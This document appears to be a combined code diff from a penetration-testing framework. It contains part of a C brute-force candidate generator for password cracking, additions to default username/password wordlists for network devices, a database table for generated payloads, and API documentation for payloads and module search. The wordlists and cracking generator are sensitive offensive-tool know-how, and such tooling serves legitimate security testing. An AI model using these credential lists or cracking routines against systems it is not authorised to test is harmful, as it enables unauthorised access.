+	while (c <= 0x18af2)	// ..to TANGUT COMPONENT-755
+		charset[i++] = c++;
+// 1B000..1B0FF; Kana Supplement
+	c = 0x1b000;		// from KATAKANA LETTER ARCHAIC E
+	while (c <= 0x1b0ff)	// ..to HENTAIGANA LETTER RE-2
+		charset[i++] = c++;
+// 1B100..1B12F; Kana Extended-A
+	c = 0x1b100;		// from HENTAIGANA LETTER RE-3
+	while (c <= 0x1b11e)	// ..to HENTAIGANA LETTER N-MU-MO-2
+		charset[i++] = c++;
+// 1B170..1B2FF; Nushu
+	c = 0x1b170;		// from NUSHU CHARACTER-1B170
+	while (c <= 0x1b2fb)	// ..to NUSHU CHARACTER-1B2FB
+		charset[i++] = c++;
+// 1BC00..1BC9F; Duployan
+	c = 0x1bc00;		// from DUPLOYAN LETTER H
+	while (c <= 0x1bc6a)	// ..to DUPLOYAN LETTER VOCALIC M
+		charset[i++] = c++;
+	c = 0x1bc70;		// from DUPLOYAN AFFIX LEFT HORIZONTAL SECANT
+	while (c <= 0x1bc7c)	// ..to DUPLOYAN AFFIX ATTACHED TANGENT HOOK
+		charset[i++] = c++;
+	c = 0x1bc80;		// from DUPLOYAN AFFIX HIGH ACUTE
+	while (c <= 0x1bc88)	// ..to DUPLOYAN AFFIX HIGH VERTICAL
+		charset[i++] = c++;
+	c = 0x1bc90;		// from DUPLOYAN AFFIX LOW ACUTE
+	while (c <= 0x1bc99)	// ..to DUPLOYAN AFFIX LOW ARROW
+		charset[i++] = c++;
+	c = 0x1bc9c;		// from DUPLOYAN SIGN O WITH CROSS
+	while (c <= 0x1bc9f)	// ..to DUPLOYAN PUNCTUATION CHINOOK FULL STOP
+		charset[i++] = c++;
+// 1BCA0..1BCAF; Shorthand Format Controls
+	c = 0x1bca0;		// from SHORTHAND FORMAT LETTER OVERLAP
+	while (c <= 0x1bca3)	// ..to SHORTHAND FORMAT UP STEP
+		charset[i++] = c++;
+// 1D000..1D0FF; Byzantine Musical Symbols
+	c = 0x1d000;		// from BYZANTINE MUSICAL SYMBOL PSILI
+	while (c <= 0x1d0f5)	// ..to BYZANTINE MUSICAL SYMBOL GORGON NEO KATO
+		charset[i++] = c++;
+// 1D100..1D1FF; Musical Symbols
+	c = 0x1d100;		// from MUSICAL SYMBOL SINGLE BARLINE
+	while (c <= 0x1d126)	// ..to MUSICAL SYMBOL DRUM CLEF-2
+		charset[i++] = c++;
+	c = 0x1d129;		// from MUSICAL SYMBOL MULTIPLE MEASURE REST
+	while (c <= 0x1d1e8)	// ..to MUSICAL SYMBOL KIEVAN FLAT SIGN
+		charset[i++] = c++;
+// 1D200..1D24F; Ancient Greek Musical Notation
+	c = 0x1d200;		// from GREEK VOCAL NOTATION SYMBOL-1
+	while (c <= 0x1d245)	// ..to GREEK MUSICAL LEIMMA
+		charset[i++] = c++;
+// 1D2E0..1D2FF; Mayan Numerals
+	c = 0x1d2e0;		// from MAYAN NUMERAL ZERO
+	while (c <= 0x1d2f3)	// ..to MAYAN NUMERAL NINETEEN
+		charset[i++] = c++;
+// 1D300..1D35F; Tai Xuan Jing Symbols
+	c = 0x1d300;		// from MONOGRAM FOR EARTH
+	while (c <= 0x1d356)	// ..to TETRAGRAM FOR FOSTERING
+		charset[i++] = c++;
+// 1D360..1D37F; Counting Rod Numerals
+	c = 0x1d360;		// from COUNTING ROD UNIT DIGIT ONE
+	while (c <= 0x1d378)	// ..to TALLY MARK FIVE
+		charset[i++] = c++;
+// 1D400..1D7FF; Mathematical Alphanumeric Symbols
+	c = 0x1d400;		// from MATHEMATICAL BOLD CAPITAL A
+	while (c <= 0x1d454)	// ..to MATHEMATICAL ITALIC SMALL G
+		charset[i++] = c++;
+	c = 0x1d456;		// from MATHEMATICAL ITALIC SMALL I
+	while (c <= 0x1d49c)	// ..to MATHEMATICAL SCRIPT CAPITAL A
+		charset[i++] = c++;
+	charset[i++] = 0x1d49e;	// MATHEMATICAL SCRIPT CAPITAL C
+	charset[i++] = 0x1d49f;	// MATHEMATICAL SCRIPT CAPITAL D
+	charset[i++] = 0x1d4a5;	// MATHEMATICAL SCRIPT CAPITAL J
+	charset[i++] = 0x1d4a6;	// MATHEMATICAL SCRIPT CAPITAL K
+	c = 0x1d4a9;		// from MATHEMATICAL SCRIPT CAPITAL N
+	while (c <= 0x1d4ac)	// ..to MATHEMATICAL SCRIPT CAPITAL Q
+		charset[i++] = c++;
+	c = 0x1d4ae;		// from MATHEMATICAL SCRIPT CAPITAL S
+	while (c <= 0x1d4b9)	// ..to MATHEMATICAL SCRIPT SMALL D
+		charset[i++] = c++;
+	c = 0x1d4bd;		// from MATHEMATICAL SCRIPT SMALL H
+	while (c <= 0x1d4c3)	// ..to MATHEMATICAL SCRIPT SMALL N
+		charset[i++] = c++;
+	c = 0x1d4c5;		// from MATHEMATICAL SCRIPT SMALL P
+	while (c <= 0x1d505)	// ..to MATHEMATICAL FRAKTUR CAPITAL B
+		charset[i++] = c++;
+	c = 0x1d507;		// from MATHEMATICAL FRAKTUR CAPITAL D
+	while (c <= 0x1d50a)	// ..to MATHEMATICAL FRAKTUR CAPITAL G
+		charset[i++] = c++;
+	c = 0x1d50d;		// from MATHEMATICAL FRAKTUR CAPITAL J
+	while (c <= 0x1d514)	// ..to MATHEMATICAL FRAKTUR CAPITAL Q
+		charset[i++] = c++;
+	c = 0x1d516;		// from MATHEMATICAL FRAKTUR CAPITAL S
+	while (c <= 0x1d51c)	// ..to MATHEMATICAL FRAKTUR CAPITAL Y
+		charset[i++] = c++;
+	c = 0x1d51e;		// from MATHEMATICAL FRAKTUR SMALL A
+	while (c <= 0x1d539)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL B
+		charset[i++] = c++;
+	c = 0x1d53b;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL D
+	while (c <= 0x1d53e)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL G
+		charset[i++] = c++;
+	c = 0x1d540;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL I
+	while (c <= 0x1d544)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL M
+		charset[i++] = c++;
+	c = 0x1d54a;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL S
+	while (c <= 0x1d550)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL Y
+		charset[i++] = c++;
+	c = 0x1d552;		// from MATHEMATICAL DOUBLE-STRUCK SMALL A
+	while (c <= 0x1d6a5)	// ..to MATHEMATICAL ITALIC SMALL DOTLESS J
+		charset[i++] = c++;
+	c = 0x1d6a8;		// from MATHEMATICAL BOLD CAPITAL ALPHA
+	while (c <= 0x1d7cb)	// ..to MATHEMATICAL BOLD SMALL DIGAMMA
+		charset[i++] = c++;
+	c = 0x1d7ce;		// from MATHEMATICAL BOLD DIGIT ZERO
+	while (c <= 0x1d7ff)	// ..to MATHEMATICAL MONOSPACE DIGIT NINE
+		charset[i++] = c++;
+// 1D800..1DAAF; Sutton SignWriting
+	c = 0x1d800;		// from SIGNWRITING HAND-FIST INDEX
+	while (c <= 0x1da8b)	// ..to SIGNWRITING PARENTHESIS
+		charset[i++] = c++;
+	c = 0x1da9b;		// from SIGNWRITING FILL MODIFIER-2
+	while (c <= 0x1da9f)	// ..to SIGNWRITING FILL MODIFIER-6
+		charset[i++] = c++;
+	c = 0x1daa1;		// from SIGNWRITING ROTATION MODIFIER-2
+	while (c <= 0x1daaf)	// ..to SIGNWRITING ROTATION MODIFIER-16
+		charset[i++] = c++;
+// 1E000..1E02F; Glagolitic Supplement
+	c = 0x1e000;		// from COMBINING GLAGOLITIC LETTER AZU
+	while (c <= 0x1e006)	// ..to COMBINING GLAGOLITIC LETTER ZHIVETE
+		charset[i++] = c++;
+	c = 0x1e008;		// from COMBINING GLAGOLITIC LETTER ZEMLJA
+	while (c <= 0x1e018)	// ..to COMBINING GLAGOLITIC LETTER HERU
+		charset[i++] = c++;
+	c = 0x1e01b;		// from COMBINING GLAGOLITIC LETTER SHTA
+	while (c <= 0x1e021)	// ..to COMBINING GLAGOLITIC LETTER YATI
+		charset[i++] = c++;
+	charset[i++] = 0x1e023;	// COMBINING GLAGOLITIC LETTER YU
+	charset[i++] = 0x1e024;	// COMBINING GLAGOLITIC LETTER SMALL YUS
+	c = 0x1e026;		// from COMBINING GLAGOLITIC LETTER YO
+	while (c <= 0x1e02a)	// ..to COMBINING GLAGOLITIC LETTER FITA
+		charset[i++] = c++;
+// 1E800..1E8DF; Mende Kikakui
+	c = 0x1e800;		// from MENDE KIKAKUI SYLLABLE M001 KI
+	while (c <= 0x1e8c4)	// ..to MENDE KIKAKUI SYLLABLE M060 NYON
+		charset[i++] = c++;
+	c = 0x1e8c7;		// from MENDE KIKAKUI DIGIT ONE
+	while (c <= 0x1e8d6)	// ..to MENDE KIKAKUI COMBINING NUMBER MILLIONS
+		charset[i++] = c++;
+// 1E900..1E95F; Adlam
+	c = 0x1e900;		// from ADLAM CAPITAL LETTER ALIF
+	while (c <= 0x1e94a)	// ..to ADLAM NUKTA
+		charset[i++] = c++;
+	c = 0x1e950;		// from ADLAM DIGIT ZERO
+	while (c <= 0x1e959)	// ..to ADLAM DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1e95e;	// ADLAM INITIAL EXCLAMATION MARK
+	charset[i++] = 0x1e95f;	// ADLAM INITIAL QUESTION MARK
+// 1EC70..1ECBF; Indic Siyaq Numbers
+	c = 0x1ec71;		// from INDIC SIYAQ NUMBER ONE
+	while (c <= 0x1ecb4)	// ..to INDIC SIYAQ ALTERNATE LAKH MARK
+		charset[i++] = c++;
+// 1EE00..1EEFF; Arabic Mathematical Alphabetic Symbols
+	c = 0x1ee00;		// from ARABIC MATHEMATICAL ALEF
+	while (c <= 0x1ee03)	// ..to ARABIC MATHEMATICAL DAL
+		charset[i++] = c++;
+	c = 0x1ee05;		// from ARABIC MATHEMATICAL WAW
+	while (c <= 0x1ee1f)	// ..to ARABIC MATHEMATICAL DOTLESS QAF
+		charset[i++] = c++;
+	charset[i++] = 0x1ee21;	// ARABIC MATHEMATICAL INITIAL BEH
+	charset[i++] = 0x1ee22;	// ARABIC MATHEMATICAL INITIAL JEEM
+	c = 0x1ee29;		// from ARABIC MATHEMATICAL INITIAL YEH
+	while (c <= 0x1ee32)	// ..to ARABIC MATHEMATICAL INITIAL QAF
+		charset[i++] = c++;
+	c = 0x1ee34;		// from ARABIC MATHEMATICAL INITIAL SHEEN
+	while (c <= 0x1ee37)	// ..to ARABIC MATHEMATICAL INITIAL KHAH
+		charset[i++] = c++;
+	charset[i++] = 0x1ee4d;	// ARABIC MATHEMATICAL TAILED NOON
+	charset[i++] = 0x1ee4f;	// ARABIC MATHEMATICAL TAILED AIN
+	charset[i++] = 0x1ee51;	// ARABIC MATHEMATICAL TAILED SAD
+	charset[i++] = 0x1ee52;	// ARABIC MATHEMATICAL TAILED QAF
+	charset[i++] = 0x1ee61;	// ARABIC MATHEMATICAL STRETCHED BEH
+	charset[i++] = 0x1ee62;	// ARABIC MATHEMATICAL STRETCHED JEEM
+	c = 0x1ee67;		// from ARABIC MATHEMATICAL STRETCHED HAH
+	while (c <= 0x1ee6a)	// ..to ARABIC MATHEMATICAL STRETCHED KAF
+		charset[i++] = c++;
+	c = 0x1ee6c;		// from ARABIC MATHEMATICAL STRETCHED MEEM
+	while (c <= 0x1ee72)	// ..to ARABIC MATHEMATICAL STRETCHED QAF
+		charset[i++] = c++;
+	c = 0x1ee74;		// from ARABIC MATHEMATICAL STRETCHED SHEEN
+	while (c <= 0x1ee77)	// ..to ARABIC MATHEMATICAL STRETCHED KHAH
+		charset[i++] = c++;
+	c = 0x1ee79;		// from ARABIC MATHEMATICAL STRETCHED DAD
+	while (c <= 0x1ee7c)	// ..to ARABIC MATHEMATICAL STRETCHED DOTLESS BEH
+		charset[i++] = c++;
+	c = 0x1ee80;		// from ARABIC MATHEMATICAL LOOPED ALEF
+	while (c <= 0x1ee89)	// ..to ARABIC MATHEMATICAL LOOPED YEH
+		charset[i++] = c++;
+	c = 0x1ee8b;		// from ARABIC MATHEMATICAL LOOPED LAM
+	while (c <= 0x1ee9b)	// ..to ARABIC MATHEMATICAL LOOPED GHAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1eea1;	// ARABIC MATHEMATICAL DOUBLE-STRUCK BEH
+	charset[i++] = 0x1eea3;	// ARABIC MATHEMATICAL DOUBLE-STRUCK DAL
+	c = 0x1eea5;		// from ARABIC MATHEMATICAL DOUBLE-STRUCK WAW
+	while (c <= 0x1eea9)	// ..to ARABIC MATHEMATICAL DOUBLE-STRUCK YEH
+		charset[i++] = c++;
+	c = 0x1eeab;		// from ARABIC MATHEMATICAL DOUBLE-STRUCK LAM
+	while (c <= 0x1eebb)	// ..to ARABIC MATHEMATICAL DOUBLE-STRUCK GHAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1eef0;	// ARABIC MATHEMATICAL OPERATOR MEEM WITH HAH WITH TATWEEL
+	charset[i++] = 0x1eef1;	// ARABIC MATHEMATICAL OPERATOR HAH WITH DAL
+// 1F000..1F02F; Mahjong Tiles
+	c = 0x1f000;		// from MAHJONG TILE EAST WIND
+	while (c <= 0x1f02b)	// ..to MAHJONG TILE BACK
+		charset[i++] = c++;
+// 1F030..1F09F; Domino Tiles
+	c = 0x1f030;		// from DOMINO TILE HORIZONTAL BACK
+	while (c <= 0x1f093)	// ..to DOMINO TILE VERTICAL-06-06
+		charset[i++] = c++;
+// 1F0A0..1F0FF; Playing Cards
+	c = 0x1f0a0;		// from PLAYING CARD BACK
+	while (c <= 0x1f0ae)	// ..to PLAYING CARD KING OF SPADES
+		charset[i++] = c++;
+	c = 0x1f0b1;		// from PLAYING CARD ACE OF HEARTS
+	while (c <= 0x1f0bf)	// ..to PLAYING CARD RED JOKER
+		charset[i++] = c++;
+	c = 0x1f0c1;		// from PLAYING CARD ACE OF DIAMONDS
+	while (c <= 0x1f0cf)	// ..to PLAYING CARD BLACK JOKER
+		charset[i++] = c++;
+	c = 0x1f0d1;		// from PLAYING CARD ACE OF CLUBS
+	while (c <= 0x1f0f5)	// ..to PLAYING CARD TRUMP-21
+		charset[i++] = c++;
+// 1F100..1F1FF; Enclosed Alphanumeric Supplement
+	c = 0x1f100;		// from DIGIT ZERO FULL STOP
+	while (c <= 0x1f10c)	// ..to DINGBAT NEGATIVE CIRCLED SANS-SERIF DIGIT ZERO
+		charset[i++] = c++;
+	c = 0x1f110;		// from PARENTHESIZED LATIN CAPITAL LETTER A
+	while (c <= 0x1f16b)	// ..to RAISED MD SIGN
+		charset[i++] = c++;
+	c = 0x1f170;		// from NEGATIVE SQUARED LATIN CAPITAL LETTER A
+	while (c <= 0x1f1ac)	// ..to SQUARED VOD
+		charset[i++] = c++;
+	c = 0x1f1e6;		// from REGIONAL INDICATOR SYMBOL LETTER A
+	while (c <= 0x1f1ff)	// ..to REGIONAL INDICATOR SYMBOL LETTER Z
+		charset[i++] = c++;
+// 1F200..1F2FF; Enclosed Ideographic Supplement
+	charset[i++] = 0x1f200;	// SQUARE HIRAGANA HOKA
+	charset[i++] = 0x1f202;	// SQUARED KATAKANA SA
+	c = 0x1f210;		// from SQUARED CJK UNIFIED IDEOGRAPH-624B
+	while (c <= 0x1f23b)	// ..to SQUARED CJK UNIFIED IDEOGRAPH-914D
+		charset[i++] = c++;
+	c = 0x1f240;		// from TORTOISE SHELL BRACKETED CJK UNIFIED IDEOGRAPH-672C
+	while (c <= 0x1f248)	// ..to TORTOISE SHELL BRACKETED CJK UNIFIED IDEOGRAPH-6557
+		charset[i++] = c++;
+	charset[i++] = 0x1f250;	// CIRCLED IDEOGRAPH ADVANTAGE
+	charset[i++] = 0x1f251;	// CIRCLED IDEOGRAPH ACCEPT
+	c = 0x1f260;		// from ROUNDED SYMBOL FOR FU
+	while (c <= 0x1f265)	// ..to ROUNDED SYMBOL FOR CAI
+		charset[i++] = c++;
+// 1F300..1F5FF; Miscellaneous Symbols and Pictographs
+	c = 0x1f300;		// from CYCLONE
+	while (c <= 0x1f5ff)	// ..to MOYAI
+		charset[i++] = c++;
+// 1F600..1F64F; Emoticons
+	c = 0x1f600;		// from GRINNING FACE
+	while (c <= 0x1f64f)	// ..to PERSON WITH FOLDED HANDS
+		charset[i++] = c++;
+// 1F650..1F67F; Ornamental Dingbats
+	c = 0x1f650;		// from NORTH WEST POINTING LEAF
+	while (c <= 0x1f67f)	// ..to REVERSE CHECKER BOARD
+		charset[i++] = c++;
+// 1F680..1F6FF; Transport and Map Symbols
+	c = 0x1f680;		// from ROCKET
+	while (c <= 0x1f6d4)	// ..to PAGODA
+		charset[i++] = c++;
+	c = 0x1f6e0;		// from HAMMER AND WRENCH
+	while (c <= 0x1f6ec)	// ..to AIRPLANE ARRIVING
+		charset[i++] = c++;
+	c = 0x1f6f0;		// from SATELLITE
+	while (c <= 0x1f6f9)	// ..to SKATEBOARD
+		charset[i++] = c++;
+// 1F700..1F77F; Alchemical Symbols
+	c = 0x1f700;		// from ALCHEMICAL SYMBOL FOR QUINTESSENCE
+	while (c <= 0x1f773)	// ..to ALCHEMICAL SYMBOL FOR HALF OUNCE
+		charset[i++] = c++;
+// 1F780..1F7FF; Geometric Shapes Extended
+	c = 0x1f780;		// from BLACK LEFT-POINTING ISOSCELES RIGHT TRIANGLE
+	while (c <= 0x1f7d8)	// ..to NEGATIVE CIRCLED SQUARE
+		charset[i++] = c++;
+// 1F800..1F8FF; Supplemental Arrows-C
+	c = 0x1f800;		// from LEFTWARDS ARROW WITH SMALL TRIANGLE ARROWHEAD
+	while (c <= 0x1f80b)	// ..to DOWNWARDS ARROW WITH LARGE TRIANGLE ARROWHEAD
+		charset[i++] = c++;
+	c = 0x1f810;		// from LEFTWARDS ARROW WITH SMALL EQUILATERAL ARROWHEAD
+	while (c <= 0x1f847)	// ..to DOWNWARDS HEAVY ARROW
+		charset[i++] = c++;
+	c = 0x1f850;		// from LEFTWARDS SANS-SERIF ARROW
+	while (c <= 0x1f859)	// ..to UP DOWN SANS-SERIF ARROW
+		charset[i++] = c++;
+	c = 0x1f860;		// from WIDE-HEADED LEFTWARDS LIGHT BARB ARROW
+	while (c <= 0x1f887)	// ..to WIDE-HEADED SOUTH WEST VERY HEAVY BARB ARROW
+		charset[i++] = c++;
+	c = 0x1f890;		// from LEFTWARDS TRIANGLE ARROWHEAD
+	while (c <= 0x1f8ad)	// ..to WHITE ARROW SHAFT WIDTH TWO THIRDS
+		charset[i++] = c++;
+// 1F900..1F9FF; Supplemental Symbols and Pictographs
+	c = 0x1f900;		// from CIRCLED CROSS FORMEE WITH FOUR DOTS
+	while (c <= 0x1f90b)	// ..to DOWNWARD FACING NOTCHED HOOK WITH DOT
+		charset[i++] = c++;
+	c = 0x1f910;		// from ZIPPER-MOUTH FACE
+	while (c <= 0x1f93e)	// ..to HANDBALL
+		charset[i++] = c++;
+	c = 0x1f940;		// from WILTED FLOWER
+	while (c <= 0x1f970)	// ..to SMILING FACE WITH SMILING EYES AND THREE HEARTS
+		charset[i++] = c++;
+	c = 0x1f973;		// from FACE WITH PARTY HORN AND PARTY HAT
+	while (c <= 0x1f976)	// ..to FREEZING FACE
+		charset[i++] = c++;
+	c = 0x1f97c;		// from LAB COAT
+	while (c <= 0x1f9a2)	// ..to SWAN
+		charset[i++] = c++;
+	c = 0x1f9b0;		// from EMOJI COMPONENT RED HAIR
+	while (c <= 0x1f9b9)	// ..to SUPERVILLAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1f9c0;	// CHEESE WEDGE
+	charset[i++] = 0x1f9c2;	// SALT SHAKER
+	c = 0x1f9d0;		// from FACE WITH MONOCLE
+	while (c <= 0x1f9ff)	// ..to NAZAR AMULET
+		charset[i++] = c++;
+// 1FA00..1FA6F; Chess Symbols
+	c = 0x1fa60;		// from XIANGQI RED GENERAL
+	while (c <= 0x1fa6d)	// ..to XIANGQI BLACK SOLDIER
+		charset[i++] = c++;
+// 20000..2A6DF; CJK Unified Ideographs Extension B
+	c = 0x20000;		// from <CJK Ideograph Extension B, First>
+	while (c <= 0x2a6d6)	// ..to <CJK Ideograph Extension B, Last>
+		charset[i++] = c++;
+// 2A700..2B73F; CJK Unified Ideographs Extension C
+	c = 0x2a700;		// from <CJK Ideograph Extension C, First>
+	while (c <= 0x2b734)	// ..to <CJK Ideograph Extension C, Last>
+		charset[i++] = c++;
+// 2B740..2B81F; CJK Unified Ideographs Extension D
+	c = 0x2b740;		// from <CJK Ideograph Extension D, First>
+	while (c <= 0x2b81d)	// ..to <CJK Ideograph Extension D, Last>
+		charset[i++] = c++;
+// 2B820..2CEAF; CJK Unified Ideographs Extension E
+	c = 0x2b820;		// from <CJK Ideograph Extension E, First>
+	while (c <= 0x2cea1)	// ..to <CJK Ideograph Extension E, Last>
+		charset[i++] = c++;
+// 2CEB0..2EBEF; CJK Unified Ideographs Extension F
+	c = 0x2ceb0;		// from <CJK Ideograph Extension F, First>
+	while (c <= 0x2ebe0)	// ..to <CJK Ideograph Extension F, Last>
+		charset[i++] = c++;
+// 2F800..2FA1F; CJK Compatibility Ideographs Supplement
+	c = 0x2f800;		// from CJK COMPATIBILITY IDEOGRAPH-2F800
+	while (c <= 0x2fa1d)	// ..to CJK COMPATIBILITY IDEOGRAPH-2FA1D
+		charset[i++] = c++;
+// E0000..E007F; Tags
+	c = 0xe0020;		// from TAG SPACE
+	while (c <= 0xe007f)	// ..to CANCEL TAG
+		charset[i++] = c++;
+// E0100..E01EF; Variation Selectors Supplement
+// F0000..FFFFF; Supplementary Private Use Area-A
+// 100000..10FFFF; Supplementary Private Use Area-B
+
+/* Zero-terminate it, and cache the first character */
+	charset[maxc = i] = 0;
+
+	length = minlength; c = 0;
+
+/* We must init word with dummy data, it doesn't get set until filter() */
+	word = 1;
+}
+
+void generate()
+{
+	int i, cl, wl;
+
+	if (target_utf8) {
+		cl = 1;
+		if (charset[c] >= 0x80) {
+			cl++;
+			if (charset[c] >= 0x0800)
+				cl++;
+			if (charset[c] >= 0x10000)
+				cl++;
+			wl = length * cl;
+			if (wl > cipher_limit) {
+				c = 0;
+				if (++length > maxlength) {
+					word = 0;
+					return;
+				}
+				cl = 1;
+				if (charset[0] >= 0x80) {
+					cl++;
+					if (charset[0] >= 0x0800)
+						cl++;
+					if (charset[0] >= 0x10000)
+						cl++;
+					wl = length * cl;
+					if (wl > cipher_limit) {
+						word = 0;
+						return;
+					}
+				}
+			}
+		}
+	}
+
+	i = 0;
+	while (i < length)
+		word[i++] = charset[c];
+	word[i] = 0;
+
+	if (++c < maxc)
+		return;
+
+	c = 0;
+	if (++length > maxlength)
+		length = 0; // Will NUL out the next "word" and thus terminate
+
+	return;
+}
+
+/* Reset length & c */
+void restore()
+{
+	length = 0;
+
+	while (word[length]) {
+		length++;
+	}
+	c = word[0];
+}
@@ -405,6 +405,7 @@ root realtek
 root root
 root tini
 root tslinux
+root ubnt
 root user
 root vizxv
 root wyse
@@ -44,7 +44,7 @@ apc
 bintec
 blue
 c
-cable-d
+cable-docsis
 canon_admin
 cc
 cisco
@@ -11,7 +11,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema.define(version: 20161227212223) do
+ActiveRecord::Schema.define(version: 20180904120211) do

  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"
@@ -475,6 +475,24 @@ ActiveRecord::Schema.define(version: 20161227212223) do
  add_index "notes", ["ntype"], name: "index_notes_on_ntype", using: :btree
  add_index "notes", ["vuln_id"], name: "index_notes_on_vuln_id", using: :btree

+  create_table "payloads", force: :cascade do |t|
+    t.string   "name"
+    t.string   "uuid"
+    t.integer  "uuid_mask"
+    t.integer  "timestamp"
+    t.string   "arch"
+    t.string   "platform"
+    t.string   "urls"
+    t.string   "description"
+    t.integer  "workspace_id"
+    t.string   "raw_payload"
+    t.string   "raw_payload_hash"
+    t.string   "build_status"
+    t.string   "build_opts"
+    t.datetime "created_at",       null: false
+    t.datetime "updated_at",       null: false
+  end
+
  create_table "profiles", force: :cascade do |t|
    t.datetime "created_at",                null: false
    t.datetime "updated_at",                null: false
@@ -15,8 +15,6 @@ module ModuleSearchApiDoc
  DISCLOSURE_DATE_DESC = 'Filter modules with a matching disclosure date.'
  DATE_DESC = 'Alias for \'disclosure_date\'.'
  FULL_NAME_DESC = 'Filter modules with a matching full name.'
-  IS_CLIENT_DESC = 'Filter modules that are client attacks. (Accepts strings \'true\' or \'false\').'
-  IS_SERVER_DESC = 'Filter modules that are server attacks. (Accepts strings \'true\' or \'false\').'
  IS_INSTALL_PATH_DESC = 'Filter modules that by value of \'is_install_path\'. (Accepts strings \'true\' or \'false\').'
  MOD_TIME_DESC = 'Filter modules with a matching modification time.'
  NAME_DESC = 'Filter modules with a matching descriptive name.'
@@ -34,7 +32,7 @@ module ModuleSearchApiDoc
  TARGETS_DESC = 'Alias for \'target\'.'
  TEXT_DESC = 'Filter modules matching any one of name, full name, description, reference, author, or targets.'
  TYPE_DESC = 'Filter modules with a matching type (exploit, auxiliary, payload, etc.).'
-  FIELDS_DESC = 'Provide a comma-delimited list of metadata fields you would like to return. If left blank, all fields will be returned. Valid field names are: \'name\', \'full_name\', \'fullname\', \'aka\', \'arch\', \'author\', \'author\', \'description\', \'disclosure_date\', \'cve\', \'edb\', \'bid\', \'mod_time\', \'is_client\', \'is_server\', \'is_install_path\', \'os\', \'platform\', \'reference\', \'references\', \'ref_name\', \'ref\', \'path\', \'port\', \'rport\', \'rank\', \'type\', \'target\', \'targets\''
+  FIELDS_DESC = 'Provide a comma-delimited list of metadata fields you would like to return. If left blank, all fields will be returned. Valid field names are: \'name\', \'full_name\', \'fullname\', \'aka\', \'arch\', \'author\', \'author\', \'description\', \'disclosure_date\', \'cve\', \'edb\', \'bid\', \'mod_time\', \'is_install_path\', \'os\', \'platform\', \'reference\', \'references\', \'ref_name\', \'ref\', \'path\', \'port\', \'rport\', \'rank\', \'type\', \'target\', \'targets\''
  NOTES_DESC = 'Extra info for a module, such as AKA names or NOCVE explanations.'

  TYPE_ENUM = [
@@ -97,8 +95,6 @@ module ModuleSearchApiDoc
    property :description, type: :string, description: DESCRIPTION_DESC, example: DESCRIPTION_EXAMPLE
    property :author, description: AUTHOR_DESC, example: AUTHOR_EXAMPLE, type: :array do items type: :string end
    property :references, description: REFERENCE_DESC, example: REFERENCES_EXAMPLE, type: :array do items type: :string end
-    property :is_client, type: :boolean, description: IS_CLIENT_DESC, example: IS_CLIENT_EXAMPLE
-    property :is_server, type: :boolean, description: IS_SERVER_DESC, example: IS_SERVER_EXAMPLE
    property :platform, type: :string, description: PLATFORM_DESC, example: PLATFORM_EXAMPLE
    property :arch, type: :string, description: ARCH_DESC, example: ARCH_EXAMPLE
    property :rport, type: :string, description: PORT_DESC, example: RPORT_EXAMPLE
@@ -130,8 +126,6 @@ module ModuleSearchApiDoc
        :disclosure_date => DISCLOSURE_DATE_DESC,
        :date => DATE_DESC,
        :full_name => FULL_NAME_DESC,
-        :is_client => IS_CLIENT_DESC,
-        :is_server => IS_SERVER_DESC,
        :is_install_path => IS_INSTALL_PATH_DESC,
        :mod_time => MOD_TIME_DESC,
        :name => NAME_DESC,
@@ -0,0 +1,242 @@
+require 'swagger/blocks'
+
+module PayloadApiDoc
+  include Swagger::Blocks
+
+  NAME_DESC = 'A name for the payload.'
+  UUID_DESC = 'A payload\'s unique identifier.'
+  UUID_EXAMPLE = '6dde5ce0e94c9f43'
+  TIMESTAMP_DESC = 'The Unix format timestamp when this payload was created.'
+  TIMESTAMP_EXAMPLE = '1536777407'
+  ARCH_DESC = 'The architecture this payload supports.'
+  ARCH_EXAMPLE = 'x86'
+  PLATFORM_DESC = 'The platform this payload supports.'
+  PLATFORM_EXAMPLE = 'windows'
+  URLS_DESC = 'The unique, encoded urls used to host this payload. Only applicable for http(s) payloads.'
+  URLS_EXAMPLE = ['/bd5c4OlMn0OeQp9AxdvC_Q2EIcdSRvg7gzLdQwU__Mb1WtjGR8C4UbjohhRIgbmBfFFBsNJ-wZMyFZKK33aorc8qfD0xCsmxSEyHaiyjGn0ykbJOlYFF1j1HXShiKiiwbfh_wPf2uqSWk2tnaLAqwuvxPcRuDPF-kdkmDDC2']
+  DESCRIPTION_DESC = 'A description of why this payload was created and what it is being used for.'
+  WORKSPACE_ID_DESC = 'The ID of the workspace this payload belongs to.'
+  WORKSPACE_ID_EXAMPLE = 1
+  RAW_PAYLOAD_DESC = 'A URL pointing to where the binary payload can be downloaded from.'
+  RAW_PAYLOAD_HASH_DESC = 'The unique hash value for the generated payload binary.'
+  BUILD_OPTS_DESC = 'A hash containing various options used to build this payload.'
+
+# Swagger documentation for payloads model
+  swagger_schema :Payload do
+    key :required, [:ntype]
+    property :workspace, type: :string, required: true, description: RootApiDoc::WORKSPACE_POST_EXAMPLE
+    property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
+    property :name, type: :string, description: NAME_DESC
+    property :uuid, type: :string, description: UUID_DESC, example: UUID_EXAMPLE
+    property :timestamp, type: :integer, description: TIMESTAMP_DESC, example: TIMESTAMP_EXAMPLE
+    property :arch, type: :string, description: ARCH_DESC, example: ARCH_EXAMPLE
+    property :platform, type: :string, description: PLATFORM_DESC, example: PLATFORM_EXAMPLE
+    property :urls, description: URLS_DESC, example: URLS_EXAMPLE, type: :array do items type: :string end
+    property :description, type: :string, description: DESCRIPTION_DESC
+    property :raw_payload, type: :string, description: RAW_PAYLOAD_DESC
+    property :raw_payload_hash, type: :string, description: RAW_PAYLOAD_HASH_DESC
+    property :build_opts, type: :string, description: BUILD_OPTS_DESC
+    property :created_at, type: :string, format: :date_time, description: RootApiDoc::CREATED_AT_DESC
